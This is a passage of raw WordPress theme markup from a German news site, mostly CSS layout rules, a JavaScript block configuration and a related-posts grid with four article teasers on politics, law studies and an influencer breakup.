Sans!important;font-size:13px!important;line-height:1!important;font-weight:500!important;text-transform:capitalize!important;letter-spacing:-0.5px!important}html:not([class*='ie']) .tdi_154 .td-module-container:hover .entry-thumb:before{opacity:0}@media (min-width:768px){.tdi_154 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}@media (min-width:1019px) and (max-width:1140px){.tdi_154 .td-module-meta-info{padding:14px 0 0 0}.tdi_154 .td_module_wrap{padding-left:7.5px;padding-right:7.5px;padding-bottom:7.5px;margin-bottom:7.5px;clear:none!important;padding-bottom:7.5px!important;margin-bottom:7.5px!important}.tdi_154 .td_block_inner{margin-left:-7.5px;margin-right:-7.5px}.tdi_154 .td-module-container:before{bottom:-7.5px}.tdi_154 .td-post-author-name{display:none}.tdi_154 .td_module_wrap:nth-child(4n+1){clear:both!important}.tdi_154 .td_module_wrap:nth-last-child(-n+4){margin-bottom:0!important;padding-bottom:0!important}.tdi_154 .td_module_wrap .td-module-container:before{display:block!important}.tdi_154 .td_module_wrap:nth-last-child(-n+4) .td-module-container:before{display:none!important}.tdi_154 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_154 .td-module-exclusive .td-module-title a:before{font-size:11px!important}.tdi_154 .entry-title{margin:0 0 6px 0;font-size:14px!important}@media (min-width:768px){.tdi_154 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}@media (min-width:768px) and (max-width:1018px){.tdi_154 .td-module-meta-info{padding:12px 0 0 0}.tdi_154 .td_module_wrap{padding-left:5px;padding-right:5px;padding-bottom:5px;margin-bottom:5px;clear:none!important;padding-bottom:5px!important;margin-bottom:5px!important}.tdi_154 .td_block_inner{margin-left:-5px;margin-right:-5px}.tdi_154 .td-module-container:before{bottom:-5px}.tdi_154 .td-post-author-name{display:none}.tdi_154 .td-icon-star,.tdi_154 .td-icon-star-empty,.tdi_154 .td-icon-star-half{font-size:10px}.tdi_154 .td_module_wrap:nth-child(4n+1){clear:both!important}.tdi_154 .td_module_wrap:nth-last-child(-n+4){margin-bottom:0!important;padding-bottom:0!important}.tdi_154 .td_module_wrap .td-module-container:before{display:block!important}.tdi_154 .td_module_wrap:nth-last-child(-n+4) .td-module-container:before{display:none!important}.tdi_154 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_154 .td-module-exclusive .td-module-title a:before{font-size:11px!important}.tdi_154 .entry-title{margin:0 0 4px 0;font-size:13px!important}.tdi_154 .td-editor-date,.tdi_154 .td-editor-date .td-post-author-name a,.tdi_154 .td-editor-date .entry-date,.tdi_154 .td-module-comments a{font-size:12px!important}@media (min-width:768px){.tdi_154 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}@media (max-width:767px){.tdi_154 .td-module-meta-info{max-width:100%}.tdi_154 .td_module_wrap{width:100%;float:left;padding-left:0px;padding-right:0px;padding-bottom:15px;margin-bottom:15px;padding-bottom:15px!important;margin-bottom:15px!important}.rtl .tdi_154 .td_module_wrap{float:right}.tdi_154 .td_block_inner{margin-left:-0px;margin-right:-0px}.tdi_154 .td-module-container:before{bottom:-15px}.tdi_154 .td_module_wrap:nth-last-child(1){margin-bottom:0!important;padding-bottom:0!important}.tdi_154 .td_module_wrap .td-module-container:before{display:block!important}.tdi_154 .td_module_wrap:nth-last-child(1) .td-module-container:before{display:none!important}.tdi_154 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_154 .td-module-exclusive .td-module-title a:before{font-size:11px!important}@media (min-width:768px){.tdi_154 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}</style><script type="rocketlazyloadscript">var block_tdi_154 = new tdBlock();
  1796. block_tdi_154.id = "tdi_154";
  1797. block_tdi_154.atts = '{"modules_on_row":"eyJhbGwiOiIyNSUiLCJwaG9uZSI6IjEwMCUifQ==","limit":"4","modules_category":"above","show_btn":"none","show_excerpt":"eyJwb3J0cmFpdCI6Im5vbmUiLCJhbGwiOiJub25lIn0=","ajax_pagination":"","td_ajax_preloading":"","sort":"","category_id":"59","f_title_font_size":"eyJhbGwiOiIxNiIsInBvcnRyYWl0IjoiMTMiLCJsYW5kc2NhcGUiOiIxNCJ9","f_title_font_line_height":"1.3","show_cat":"none","meta_info_border_style":"","meta_padding":"eyJhbGwiOiIxNnB4IDAgMCAwIiwibGFuZHNjYXBlIjoiMTRweCAwIDAgMCIsInBvcnRyYWl0IjoiMTJweCAwIDAgMCJ9","modules_divider":"","image_size":"","meta_info_align":"","image_floated":"","tdc_css":"eyJhbGwiOnsibWFyZ2luLWJvdHRvbSI6IjAiLCJkaXNwbGF5IjoiIn0sImxhbmRzY2FwZSI6eyJkaXNwbGF5IjoiIn0sImxhbmRzY2FwZV9tYXhfd2lkdGgiOjExNDAsImxhbmRzY2FwZV9taW5fd2lkdGgiOjEwMTksInBvcnRyYWl0Ijp7ImRpc3BsYXkiOiIifSwicG9ydHJhaXRfbWF4X3dpZHRoIjoxMDE4LCJwb3J0cmFpdF9taW5fd2lkdGgiOjc2OCwicGhvbmUiOnsibWFyZ2luLWJvdHRvbSI6IjAiLCJkaXNwbGF5IjoiIn0sInBob25lX21heF93aWR0aCI6NzY3fQ==","meta_info_horiz":"content-horiz-left","f_title_font_weight":"600","image_height":"70","all_modules_space":"eyJwaG9uZSI6IjMwIiwicG9ydHJhaXQiOiIxMCIsImFsbCI6IjIwIiwibGFuZHNjYXBlIjoiMTUifQ==","art_excerpt":"0","art_title":"eyJsYW5kc2NhcGUiOiIwIDAgNnB4IDAiLCJwb3J0cmFpdCI6IjAgMCA0cHggMCIsImFsbCI6IjAgMCA4cHggMCJ9","btn_bg":"rgba(255,255,255,0)","f_btn_font_transform":"uppercase","f_btn_font_weight":"","btn_bg_hover":"rgba(255,255,255,0)","meta_width":"eyJwaG9uZSI6IjEwMCUifQ==","show_audio":"","show_com":"none","show_date":"","show_author":"eyJwb3J0cmFpdCI6Im5vbmUiLCJsYW5kc2NhcGUiOiJub25lIn0=","mc1_el":"10","f_title_font_family":"456","f_title_font_transform":"","title_txt":"#000000","title_txt_hover":"#f43f3f","cat_txt":"#ec3535","cat_bg":"rgba(255,255,255,0)","modules_category_padding":"0","modules_gap":"eyJhbGwiOiIyMCIsImxhbmRzY2FwZSI6IjE1IiwicG9ydHJhaXQiOiIxMCIsInBob25lIjoiMCJ9","modules_category_margin":"0","modules_cat_border":"0","columns":"33.33333333%","columns_gap":"eyJhbGwiOiIyMCIsImxhbmRzY2FwZSI6IjE1IiwicG9ydHJhaXQiOiIxMCIsInBob25lIjoiMCJ9","modules_space1":"eyJhbGwiOiIyMCIsImxhbmRzY2FwZSI6IjE1IiwicG9ydHJhaXQiOiIxMiIsInBob25lIjoiMzAifQ==","hide_image3":"yes","category_ids":"","image_height1":"70","modules_space2":"eyJhbGwiOiIyMCIsImxhbmRzY2FwZSI6IjE2IiwicG9ydHJhaXQiOiIxMCJ9","meta_padding2":"0","art_title1":"eyJhbGwiOiIwIDAgMTJweCAwIiwibGFuZHNjYXBlIjoiMCAwIDEwcHgiLCJwb3J0cmFpdCI6IjAgMCA4cHgifQ==","art_title2":"eyJhbGwiOiIwIDAgOHB4IDAiLCJwb3J0cmFpdCI6IjAiLCJsYW5kc2NhcGUiOiIwIDAgNnB4IDAifQ==","f_title1_font_family":"456","f_title2_font_family":"653","f_title1_font_size":"eyJhbGwiOiIyNiIsImxhbmRzY2FwZSI6IjE5IiwicG9ydHJhaXQiOiIxNyJ9","f_title1_font_line_height":"1.1","f_title1_font_weight":"600","f_title2_font_weight":"600","f_title1_font_transform":"","f_title2_font_transform":"","title_txt2":"#000000","title_txt_hover2":"#f43f3f","show_excerpt2":"none","show_com2":"none","show_date2":"eyJwb3J0cmFpdCI6Im5vbmUifQ==","show_author2":"none","modules_category3":"","modules_category_margin1":"0","modules_category_margin2":"0","modules_category_padding1":"0","modules_category_padding2":"0","modules_cat_border1":"0","modules_cat_border2":"0","cat_bg2":"rgba(255,255,255,0)","cat_txt2":"#ec3535","author_photo_radius1":"100%","author_photo_radius2":"100%","review_size2":"eyJhbGwiOiIyLjUiLCJwb3J0cmFpdCI6IjAifQ==","f_meta1_font_family":"653","f_meta2_font_family":"653","f_meta1_font_size":"eyJhbGwiOiIxMyIsInBvcnRyYWl0IjoiMTIifQ==","f_meta1_font_line_height":"1","f_meta1_font_weight":"500","f_meta2_font_weight":"500","f_meta1_font_transform":"capitalize","f_meta2_font_transform":"capitalize","f_meta1_font_spacing":"-0.5","meta_info_align1":"","meta_padding1":"eyJhbGwiOiIyMHB4IDAiLCJsYW5kc2NhcGUiOiIxNXB4IDAiLCJwb3J0cmFpdCI6IjEycHggMCIsInBob25lIjoiMjBweCAwIDAifQ==","show_author1":"eyJsYW5kc2NhcGUiOiJub25lIiwicG9ydHJhaXQiOiJub25lIn0=","show_com1":"none","show_excerpt1":"none","modules_border_size1":"eyJhbGwiOiIwIDAgMXB4IDAiLCJwaG9uZSI6IjAifQ==","show_cat1":"none","show_cat2":"none","author_photo":"yes","f_title2_font_size":"eyJhbGwiOiIxNiIsImxhbmRzY2FwZSI6IjE1IiwicG9ydHJhaXQiOiIxMyJ9","f_title2_font_line_height":"1.2","f_meta2_font_size":"eyJhbGwiOiIxMyIsInBvcnRyYWl0IjoiMTIifQ==","f_meta2_font_line_height":"1","f_meta2_font_spacing":"-0.5","all_underline_color1":"","author_txt":"#000000","author_txt_hover":"#ec3535","date_txt":"#000000","all_underline_color2":"","date_txt2":"#000000","author_photo_radius":"100%","review_size":"eyJhbGwiOiIyLjUiLCJwb3J0cmFpdCI6IjAifQ==","f_meta_font_family":"653","f_meta_font_size":"eyJhbGwiOiIxMyIsInBvcnRyYWl0IjoiMTIifQ==","f_meta_font_line_height":"1","f_meta_font_weight":"500","f_meta_font_transform":"capitalize","f_meta_font_spacing":"-0.5","offset":"2","excl_margin":"-4px 5px 0 0","excl_padd":"3px 5px","excl_radius":"2","excl_color":"#ffffff","excl_color_h":"#ffffff","excl_bg":"#ec3535","excl_bg_h":"#ec3535","f_excl_font_family":"653","f_excl_font_transform":"uppercase","f_excl_font_size":"eyJhbGwiOiIxMiIsImxhbmRzY2FwZSI6IjExIiwicG9ydHJhaXQiOiIxMSIsInBob25lIjoiMTEifQ==","f_excl_font_weight":"500","f_excl_font_line_height":"1","f_excl_font_spacing":"-0.5","block_type":"td_flex_block_1","separator":"","custom_title":"","custom_url":"","block_template_id":"","title_tag":"","mc1_tl":"","mc1_title_tag":"","post_ids":"","taxonomies":"","in_all_terms":"","tag_slug":"","autors_id":"","installed_post_types":"","include_cf_posts":"","exclude_cf_posts":"","linked_posts":"","favourite_only":"","locked_only":"","open_in_new_window":"","show_modified_date":"","time_ago":"","time_ago_add_txt":"ago","time_ago_txt_pos":"","review_source":"","el_class":"","td_query_cache":"","td_query_cache_expiration":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","container_width":"","m_padding":"","modules_border_size":"","modules_border_style":"","modules_border_color":"#eaeaea","modules_border_radius":"","modules_divider_color":"#eaeaea","h_effect":"","image_alignment":"50","image_width":"","image_radius":"","hide_image":"","show_favourites":"","fav_size":"2","fav_space":"","fav_ico_color":"","fav_ico_color_h":"","fav_bg":"","fav_bg_h":"","fav_shadow_shadow_header":"","fav_shadow_shadow_title":"Shadow","fav_shadow_shadow_size":"","fav_shadow_shadow_offset_horizontal":"","fav_shadow_shadow_offset_vertical":"","fav_shadow_shadow_spread":"","fav_shadow_shadow_color":"","video_icon":"","video_popup":"yes","video_rec":"","spot_header":"","video_rec_title":"","video_rec_color":"","video_rec_disable":"","autoplay_vid":"yes","show_vid_t":"block","vid_t_margin":"","vid_t_padding":"","video_title_color":"","video_title_color_h":"","video_bg":"","video_overlay":"","vid_t_color":"","vid_t_bg_color":"","f_vid_title_font_header":"","f_vid_title_font_title":"Video pop-up article title","f_vid_title_font_settings":"","f_vid_title_font_family":"","f_vid_title_font_size":"","f_vid_title_font_line_height":"","f_vid_title_font_style":"","f_vid_title_font_weight":"","f_vid_title_font_transform":"","f_vid_title_font_spacing":"","f_vid_title_":"","f_vid_time_font_title":"Video duration text","f_vid_time_font_settings":"","f_vid_time_font_family":"","f_vid_time_font_size":"","f_vid_time_font_line_height":"","f_vid_time_font_style":"","f_vid_time_font_weight":"","f_vid_time_font_transform":"","f_vid_time_font_spacing":"","f_vid_time_":"","excl_show":"inline-block","excl_txt":"","all_excl_border":"","all_excl_border_style":"solid","all_excl_border_color":"","excl_border_color_h":"","f_excl_font_header":"","f_excl_font_title":"Label text","f_excl_font_settings":"","f_excl_font_style":"","f_excl_":"","meta_margin":"","meta_space":"","art_btn":"","meta_info_border_size":"","meta_info_border_color":"#eaeaea","meta_info_border_radius":"","modules_category_radius":"0","modules_extra_cat":"","author_photo_size":"","author_photo_space":"","show_review":"inline-block","review_space":"","review_distance":"","excerpt_col":"1","excerpt_gap":"","excerpt_middle":"","excerpt_inline":"","hide_audio":"","art_audio":"","art_audio_size":"1.5","btn_title":"","btn_margin":"","btn_padding":"","btn_border_width":"","btn_radius":"","pag_space":"","pag_padding":"","pag_border_width":"","pag_border_radius":"","prev_tdicon":"","next_tdicon":"","pag_icons_size":"","f_header_font_header":"","f_header_font_title":"Block header","f_header_font_settings":"","f_header_font_family":"","f_header_font_size":"","f_header_font_line_height":"","f_header_font_style":"","f_header_font_weight":"","f_header_font_transform":"","f_header_font_spacing":"","f_header_":"","f_ajax_font_title":"Ajax categories","f_ajax_font_settings":"","f_ajax_font_family":"","f_ajax_font_size":"","f_ajax_font_line_height":"","f_ajax_font_style":"","f_ajax_font_weight":"","f_ajax_font_transform":"","f_ajax_font_spacing":"","f_ajax_":"","f_more_font_title":"Load more button","f_more_font_settings":"","f_more_font_family":"","f_more_font_size":"","f_more_font_line_height":"","f_more_font_style":"","f_more_font_weight":"","f_more_font_transform":"","f_more_font_spacing":"","f_more_":"","f_title_font_header":"","f_title_font_title":"Article title","f_title_font_settings":"","f_title_font_style":"","f_title_font_spacing":"","f_title_":"","f_cat_font_title":"Article category tag","f_cat_font_settings":"","f_cat_font_family":"","f_cat_font_size":"","f_cat_font_line_height":"","f_cat_font_style":"","f_cat_font_weight":"","f_cat_font_transform":"","f_cat_font_spacing":"","f_cat_":"","f_meta_font_title":"Article meta info","f_meta_font_settings":"","f_meta_font_style":"","f_meta_":"","f_ex_font_title":"Article excerpt","f_ex_font_settings":"","f_ex_font_family":"","f_ex_font_size":"","f_ex_font_line_height":"","f_ex_font_style":"","f_ex_font_weight":"","f_ex_font_transform":"","f_ex_font_spacing":"","f_ex_":"","f_btn_font_title":"Article read more button","f_btn_font_settings":"","f_btn_font_family":"","f_btn_font_size":"","f_btn_font_line_height":"","f_btn_font_style":"","f_btn_font_spacing":"","f_btn_":"","mix_color":"","mix_type":"","fe_brightness":"1","fe_contrast":"1","fe_saturate":"1","mix_color_h":"","mix_type_h":"","fe_brightness_h":"1","fe_contrast_h":"1","fe_saturate_h":"1","m_bg":"","color_overlay":"","shadow_shadow_header":"","shadow_shadow_title":"Module Shadow","shadow_shadow_size":"","shadow_shadow_offset_horizontal":"","shadow_shadow_offset_vertical":"","shadow_shadow_spread":"","shadow_shadow_color":"","all_underline_height":"","all_underline_color":"","cat_bg_hover":"","cat_txt_hover":"","cat_border":"","cat_border_hover":"","meta_bg":"","ex_txt":"","com_bg":"","com_txt":"","rev_txt":"","audio_btn_color":"","audio_time_color":"","audio_bar_color":"","audio_bar_curr_color":"","shadow_m_shadow_header":"","shadow_m_shadow_title":"Meta info shadow","shadow_m_shadow_size":"","shadow_m_shadow_offset_horizontal":"","shadow_m_shadow_offset_vertical":"","shadow_m_shadow_spread":"","shadow_m_shadow_color":"","btn_txt":"","btn_txt_hover":"","btn_border":"","btn_border_hover":"","pag_text":"","pag_h_text":"","pag_bg":"","pag_h_bg":"","pag_border":"","pag_h_border":"","ajax_pagination_next_prev_swipe":"","ajax_pagination_infinite_stop":"","css":"","td_column_number":3,"header_color":"","color_preset":"","border_top":"","class":"tdi_154","tdc_css_class":"tdi_154","tdc_css_class_style":"tdi_154_rand_style"}';
  1798. block_tdi_154.td_column_number = "3";
  1799. block_tdi_154.block_type = "td_flex_block_1";
  1800. block_tdi_154.post_count = "4";
  1801. block_tdi_154.found_posts = "7";
  1802. block_tdi_154.header_color = "";
  1803. block_tdi_154.ajax_pagination_infinite_stop = "";
  1804. block_tdi_154.max_num_pages = "2";
  1805. tdBlocksArray.push(block_tdi_154);
  1806. </script><div class="td-block-title-wrap"></div><div id=tdi_154 class="td_block_inner td-mc1-wrap">
  1807.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  1808.            <div class="td-module-container td-category-pos-above">
  1809.                                    <div class="td-image-container">
  1810.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/ex-premierminister-khan-zu-drei-jahren-haft-verurteilt/"  rel="bookmark" class="td-image-wrap " title="Ex-Premierminister Khan Zu Drei Jahren Haft Verurteilt" ><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2023/08/Ex-Premierminister-Khan-zu-drei-Jahren-Haft-verurteilt-696x376.jpg"  ></span></a></div>                                                                    </div>
  1811.                
  1812.                <div class="td-module-meta-info">
  1813.                                        
  1814.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/ex-premierminister-khan-zu-drei-jahren-haft-verurteilt/"  rel="bookmark" title="Ex-Premierminister Khan Zu Drei Jahren Haft Verurteilt">Ex-Premierminister Khan Zu Drei Jahren Haft Verurteilt</a></h3>
  1815.                    
  1816.                                            <div class="td-editor-date">
  1817.                                                        
  1818.                                                            <span class="td-author-date">
  1819.                                    <a href="https://nachrichtenmorgen.de/author/mianbunny/" aria-label="author-photo" class="td-author-photo"><img alt='Jack Hobin' src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2096%2096'%3E%3C/svg%3E" data-lazy-srcset='https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' data-lazy-src="https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=96&#038;d=mm&#038;r=g" /><noscript><img alt='Jack Hobin' src='https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=96&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' /></noscript></a>                                    <span class="td-post-author-name"><a href="https://nachrichtenmorgen.de/author/mianbunny/">Jack Hobin</a> <span>-</span> </span>                                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2023-08-05T14:10:25+02:00" >August 5, 2023</time></span>                                                                                                        </span>
  1820.                                                    </div>
  1821.                    
  1822.                    <div class="td-excerpt">Die politische Landschaft Pakistans wird derzeit von einem Machtkampf...</div>
  1823.                    
  1824.                                    </div>
  1825.            </div>
  1826.        </div>
  1827.  
  1828.        
  1829.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  1830.            <div class="td-module-container td-category-pos-above">
  1831.                                    <div class="td-image-container">
  1832.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/jura-studium/"  rel="bookmark" class="td-image-wrap " title="Das Jura Studium: Dauer, Nc, Voraussetzungen Und Mehr" ><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2023/06/jura-studium-696x376.jpg"  ></span></a></div>                                                                    </div>
  1833.                
  1834.                <div class="td-module-meta-info">
  1835.                                        
  1836.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/jura-studium/"  rel="bookmark" title="Das Jura Studium: Dauer, Nc, Voraussetzungen Und Mehr">Das Jura Studium: Dauer, Nc, Voraussetzungen Und Mehr</a></h3>
  1837.                    
  1838.                                            <div class="td-editor-date">
  1839.                                                        
  1840.                                                            <span class="td-author-date">
  1841.                                    <a href="https://nachrichtenmorgen.de/author/anjani-cole/" aria-label="author-photo" class="td-author-photo"><img alt='Annelie Felix' src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2096%2096'%3E%3C/svg%3E" data-lazy-srcset='https://secure.gravatar.com/avatar/3a6407dd6d186ce9db0803fee81b262e?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' data-lazy-src="https://secure.gravatar.com/avatar/3a6407dd6d186ce9db0803fee81b262e?s=96&#038;d=mm&#038;r=g" /><noscript><img alt='Annelie Felix' src='https://secure.gravatar.com/avatar/3a6407dd6d186ce9db0803fee81b262e?s=96&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/3a6407dd6d186ce9db0803fee81b262e?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' /></noscript></a>                                    <span class="td-post-author-name"><a href="https://nachrichtenmorgen.de/author/anjani-cole/">Annelie Felix</a> <span>-</span> </span>                                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2023-06-17T19:44:45+02:00" >Juni 17, 2023</time></span>                                                                                                        </span>
  1842.                                                    </div>
  1843.                    
  1844.                    <div class="td-excerpt">Das Jura Studium ist eine beliebte Studienwahl für all...</div>
  1845.                    
  1846.                                    </div>
  1847.            </div>
  1848.        </div>
  1849.  
  1850.        
  1851.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  1852.            <div class="td-module-container td-category-pos-above">
  1853.                                    <div class="td-image-container">
  1854.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/politik-ausland/"  rel="bookmark" class="td-image-wrap " title="Politik Ausland: Aktuelle Nachrichten Und Hintergründe" ><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2023/05/politik-ausland-c-1-696x376.jpg"  ></span></a></div>                                                                    </div>
  1855.                
  1856.                <div class="td-module-meta-info">
  1857.                                        
  1858.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/politik-ausland/"  rel="bookmark" title="Politik Ausland: Aktuelle Nachrichten Und Hintergründe">Politik Ausland: Aktuelle Nachrichten Und Hintergründe</a></h3>
  1859.                    
  1860.                                            <div class="td-editor-date">
  1861.                                                        
  1862.                                                            <span class="td-author-date">
  1863.                                    <a href="https://nachrichtenmorgen.de/author/anjani-cole/" aria-label="author-photo" class="td-author-photo"><img alt='Annelie Felix' src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2096%2096'%3E%3C/svg%3E" data-lazy-srcset='https://secure.gravatar.com/avatar/3a6407dd6d186ce9db0803fee81b262e?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' data-lazy-src="https://secure.gravatar.com/avatar/3a6407dd6d186ce9db0803fee81b262e?s=96&#038;d=mm&#038;r=g" /><noscript><img alt='Annelie Felix' src='https://secure.gravatar.com/avatar/3a6407dd6d186ce9db0803fee81b262e?s=96&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/3a6407dd6d186ce9db0803fee81b262e?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' /></noscript></a>                                    <span class="td-post-author-name"><a href="https://nachrichtenmorgen.de/author/anjani-cole/">Annelie Felix</a> <span>-</span> </span>                                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2023-05-27T12:51:42+02:00" >Mai 27, 2023</time></span>                                                                                                        </span>
  1864.                                                    </div>
  1865.                    
  1866.                    <div class="td-excerpt">Politik Ausland ist ein wichtiges Thema in der heutigen...</div>
  1867.                    
  1868.                                    </div>
  1869.            </div>
  1870.        </div>
  1871.  
  1872.        
  1873.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  1874.            <div class="td-module-container td-category-pos-above">
  1875.                                    <div class="td-image-container">
  1876.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/bibi-und-julian/"  rel="bookmark" class="td-image-wrap " title="Bibi und Julian: Eine Trennung, die die Fans schockierte" ><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2023/05/Bibi-und-Julian-696x376.jpg"  ></span></a></div>                                                                    </div>
  1877.                
  1878.                <div class="td-module-meta-info">
  1879.                                        
  1880.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/bibi-und-julian/"  rel="bookmark" title="Bibi und Julian: Eine Trennung, die die Fans schockierte">Bibi und Julian: Eine Trennung, die die Fans schockierte</a></h3>
  1881.                    
  1882.                                            <div class="td-editor-date">
  1883.                                                        
  1884.                                                            <span class="td-author-date">
  1885.                                    <a href="https://nachrichtenmorgen.de/author/paul/" aria-label="author-photo" class="td-author-photo"><img alt='Team Nachrichtenmorgen.de' src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2096%2096'%3E%3C/svg%3E" data-lazy-srcset='https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' data-lazy-src="https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=96&#038;d=mm&#038;r=g" /><noscript><img alt='Team Nachrichtenmorgen.de' src='https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=96&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' /></noscript></a>                                    <span class="td-post-author-name"><a href="https://nachrichtenmorgen.de/author/paul/">Team Nachrichtenmorgen.de</a> <span>-</span> </span>                                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2023-05-27T10:03:29+02:00" >Mai 27, 2023</time></span>                                                                                                        </span>
  1886.                                                    </div>
  1887.                    
  1888.                    <div class="td-excerpt">In der Welt der Influencer gibt es einige Paare,...</div>
  1889.                    
  1890.                                    </div>
  1891.            </div>
  1892.        </div>
  1893.  
  1894.        </div></div></div></div></div></div><div id="tdi_155" class="tdc-row stretch_row_1400 td-stretch-content"><div class="vc_row tdi_156  wpb_row td-pb-row" >
  1895. <style scoped>.tdi_156,.tdi_156 .tdc-columns{min-height:0}.tdi_156,.tdi_156 .tdc-columns{display:block}.tdi_156 .tdc-columns{width:100%}.tdi_156{margin-bottom:65px!important}.tdi_156 .td_block_wrap{text-align:left}@media (max-width:767px){.tdi_156{margin-bottom:60px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_156{margin-bottom:45px!important}}@media (min-width:1019px) and (max-width:1140px){.tdi_156{margin-bottom:45px!important}}</style><div class="vc_column tdi_158  wpb_column vc_column_container tdc-column td-pb-span12">
  1896. <style scoped>.tdi_158{vertical-align:baseline}.tdi_158>.wpb_wrapper,.tdi_158>.wpb_wrapper>.tdc-elements{display:block}.tdi_158>.wpb_wrapper>.tdc-elements{width:100%}.tdi_158>.wpb_wrapper>.vc_row_inner{width:auto}.tdi_158>.wpb_wrapper{width:auto;height:auto}.tdi_158{padding-top:5px!important}@media (max-width:767px){.tdi_158{padding-top:0px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_158{padding-top:0px!important}}</style><div class="wpb_wrapper" ><div class="vc_row_inner tdi_160  vc_row vc_inner wpb_row td-pb-row" >
  1897. <style scoped>.tdi_160{position:relative!important;top:0;transform:none;-webkit-transform:none}.tdi_160,.tdi_160 .tdc-inner-columns{display:block}.tdi_160 .tdc-inner-columns{width:100%}.tdi_160{margin-right:0px!important;margin-bottom:40px!important;margin-left:0px!important;padding-bottom:15px!important;border-color:#ec3535!important;border-style:solid!important;border-width:0px 0px 3px 0px!important}.tdi_160 .td_block_wrap{text-align:left}@media (min-width:1019px) and (max-width:1140px){.tdi_160{margin-bottom:30px!important;padding-bottom:12px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_160{margin-bottom:25px!important;padding-bottom:10px!important}}@media (max-width:767px){.tdi_160{margin-bottom:30px!important;width:100%!important}}</style><div class="vc_column_inner tdi_162  wpb_column vc_column_container tdc-inner-column td-pb-span12">
  1898. <style scoped>.tdi_162{vertical-align:baseline}.tdi_162 .vc_column-inner>.wpb_wrapper,.tdi_162 .vc_column-inner>.wpb_wrapper .tdc-elements{display:flex;flex-direction:row;flex-wrap:nowrap;justify-content:flex-start;align-items:center}.tdi_162 .vc_column-inner>.wpb_wrapper .tdc-elements{width:100%}.tdi_162 .vc_column-inner,.tdi_162 .vc_column-inner>.wpb_wrapper{width:100%;height:100%}</style><div class="vc_column-inner"><div class="wpb_wrapper" ><div class="tdm_block td_block_wrap tdm_block_inline_text tdi_163 tdm-inline-block td-pb-border-top td_block_template_1"  data-td-block-uid="tdi_163" >
  1899. <style>.tdi_163{margin-top:-10px!important;margin-left:-24px!important}@media (min-width:768px) and (max-width:1018px){.tdi_163{margin-top:-5px!important;margin-left:-15px!important}}@media (min-width:1019px) and (max-width:1140px){.tdi_163{margin-left:-20px!important}}@media (max-width:767px){.tdi_163{margin-top:-5px!important;margin-left:0px!important}}</style>
